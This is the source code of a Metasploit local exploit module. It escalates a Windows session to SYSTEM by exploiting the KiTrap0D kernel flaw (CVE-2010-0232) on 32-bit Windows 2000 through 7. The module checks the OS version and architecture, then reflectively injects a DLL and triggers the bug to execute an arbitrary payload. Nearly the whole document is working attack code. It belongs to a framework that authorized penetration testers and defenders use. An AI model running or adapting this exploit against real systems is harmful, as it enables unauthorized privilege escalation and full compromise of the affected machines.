## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Local Rank = GreatRanking include Msf::Post::File include Msf::Post::Windows::Priv include Msf::Post::Windows::Process include Msf::Post::Windows::ReflectiveDLLInjection def initialize(info = {}) super( update_info( info, 'Name' => 'Windows SYSTEM Escalation via KiTrap0D', 'Description' => %q{ This module will create a new session with SYSTEM privileges via the KiTrap0D exploit by Tavis Ormandy. If the session in use is already elevated then the exploit will not run. The module relies on kitrap0d.x86.dll, and is not supported on x64 editions of Windows. }, 'License' => MSF_LICENSE, 'Author' => [ 'Tavis Ormandy', # Original resesarcher and exploit creator 'HD Moore', # Port of Tavis' code to meterpreter module 'Pusscat', # Port of Tavis' code to meterpreter module 'OJ Reeves' # Port of meterpreter code to a windows local exploit ], 'SessionTypes' => [ 'meterpreter' ], 'Targets' => [ [ 'Windows 2K SP4 - Windows 7 (x86)', { 'Arch' => ARCH_X86, 'Platform' => 'win' } ] ], 'DefaultTarget' => 0, 'References' => [ [ 'CVE', '2010-0232' ], [ 'OSVDB', '61854' ], [ 'MSB', 'MS10-015' ], [ 'EDB', '11199' ], [ 'URL', 'https://seclists.org/fulldisclosure/2010/Jan/341' ] ], 'DisclosureDate' => '2010-01-19', 'Notes' => { 'Reliability' => UNKNOWN_RELIABILITY, 'Stability' => UNKNOWN_STABILITY, 'SideEffects' => UNKNOWN_SIDE_EFFECTS } ) ) end def check # Validate platform architecture if sysinfo['Architecture'] == ARCH_X64 return Exploit::CheckCode::Safe('Target is not vulnerable') end # Validate OS version version = get_version_info unless version.build_number.between?(Msf::WindowsVersion::Win2000, Msf::WindowsVersion::Win7_SP1) return Exploit::CheckCode::Safe("Version #{version} is not vulnerable") end return Exploit::CheckCode::Detected("Version #{version} detected but not confirmed vulnerable") end def exploit if is_system? fail_with(Failure::None, 'Session is already elevated') end if check == Exploit::CheckCode::Safe fail_with(Failure::NotVulnerable, 'Exploit not available on this system.') end print_status('Reflectively injecting payload and triggering the bug...') encoded_payload = payload.encoded execute_dll( ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2010-0232', 'kitrap0d.x86.dll'), encoded_payload ) print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.') end end